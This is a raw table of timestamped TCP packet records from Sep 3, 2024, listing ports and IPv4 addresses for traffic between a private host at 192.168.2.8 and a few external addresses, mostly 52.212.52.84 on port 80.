Sep 3, 2024 17:13:22.602478027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.602504015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.602508068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602523088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602571011 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.602727890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602727890 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.602741957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602826118 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.602826118 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.603755951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.603770018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.603785038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.603797913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.603828907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.603873968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.603884935 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.603905916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.603919029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.603934050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.603945971 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.604007006 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.604007006 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.604660988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.604675055 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.604690075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.604756117 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.604756117 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.604768991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.604782104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.604795933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.604815960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.604830980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.604898930 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.604914904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.604929924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.604943991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.604945898 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.604959965 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.604974031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.604986906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.604990005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605001926 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.605052948 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.605052948 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.605149031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605163097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605176926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605192900 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.605212927 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.605266094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605278969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605293036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605300903 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605319977 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.605365038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.605397940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605417967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605432034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605444908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605458975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605472088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605474949 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.605489016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605498075 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.605506897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605520010 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.605545044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.605545044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.605700970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605712891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605726004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605741024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605753899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605770111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605791092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.605802059 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.605802059 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.605802059 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.605813980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.605905056 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.606400967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.606414080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.606427908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.606441021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.606468916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.606514931 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.606643915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.606657982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.606671095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.606705904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.606728077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.606739998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.606746912 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.606754065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.606770039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.606782913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.606784105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.606800079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.606816053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.606816053 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.606924057 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.607081890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.607191086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.607283115 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.607897043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.607911110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.607929945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.607959986 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.607994080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608012915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608026981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608037949 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.608042955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608058929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608062029 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.608094931 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.608119011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608131886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608145952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608154058 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.608164072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608179092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608192921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608196974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.608230114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.608231068 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.608349085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.608417034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608429909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608464956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608478069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608495951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608501911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.608501911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.608501911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.608510971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608524084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.608562946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.608576059 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.608724117 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.608928919 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.661149025 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:22.669007063 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:22.679425001 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:22.685429096 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:22.690496922 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:22.690509081 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:22.690522909 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:22.690560102 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:22.690579891 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:22.690592051 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:22.721930027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.721950054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.721966028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.721978903 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.721993923 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.722007036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.722026110 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.722026110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.722040892 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.722074032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.722122908 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.722208977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.722326994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.722338915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.722352028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.722367048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.722373962 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.722379923 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.722389936 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.722398996 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.722409964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.722413063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.722477913 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.722477913 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.723062992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.723074913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.723087072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.723124027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.723146915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.723160982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.723175049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.723184109 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.723191977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.723206043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.723211050 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.723211050 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.723268032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.723268032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.724642992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.724656105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.724669933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.724714041 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.724730968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.724790096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.724811077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.724828959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.724843025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.724857092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.724879980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.724879980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.724879980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.724879980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.724919081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.724935055 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.724948883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.724953890 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.724967003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.724980116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.724994898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.725029945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.725029945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.725029945 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.725059032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.726799011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.726880074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.726890087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.726902962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.726924896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.726938963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727011919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727013111 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.727025986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727037907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727062941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.727062941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.727097034 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.727598906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727611065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727623940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727638960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727653027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.727657080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727679968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727682114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.727694035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727710009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727722883 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.727726936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727744102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727750063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.727757931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727772951 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.727773905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727796078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727806091 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.727823973 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.727829933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727843046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727857113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727869034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727883101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727895021 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.727895021 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.727895021 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.727899075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727915049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.727922916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.727966070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.727997065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728009939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728022099 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.728065014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.728089094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728102922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728115082 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728152990 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.728238106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728250980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728262901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728269100 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.728285074 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728298903 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728308916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.728310108 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.728312969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728328943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728347063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728384972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.728384972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.728405952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728420973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728437901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728445053 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.728527069 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.728527069 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.728699923 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728754997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728761911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.728770971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728785038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.728801012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.728825092 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.728857040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.729027033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729041100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729055882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729068041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729082108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729095936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729103088 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.729103088 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.729115009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.729183912 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.729281902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729295969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729316950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729331017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729345083 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.729346037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729357004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.729361057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729399920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.729399920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.729454994 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.729789972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729804039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729815960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729830980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729846001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729846954 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.729868889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729883909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729898930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.729927063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.729927063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.729928017 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.729962111 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.729962111 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.730305910 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.730319977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.730333090 CEST	80	49730	52.212.52.84	192.168.2.8
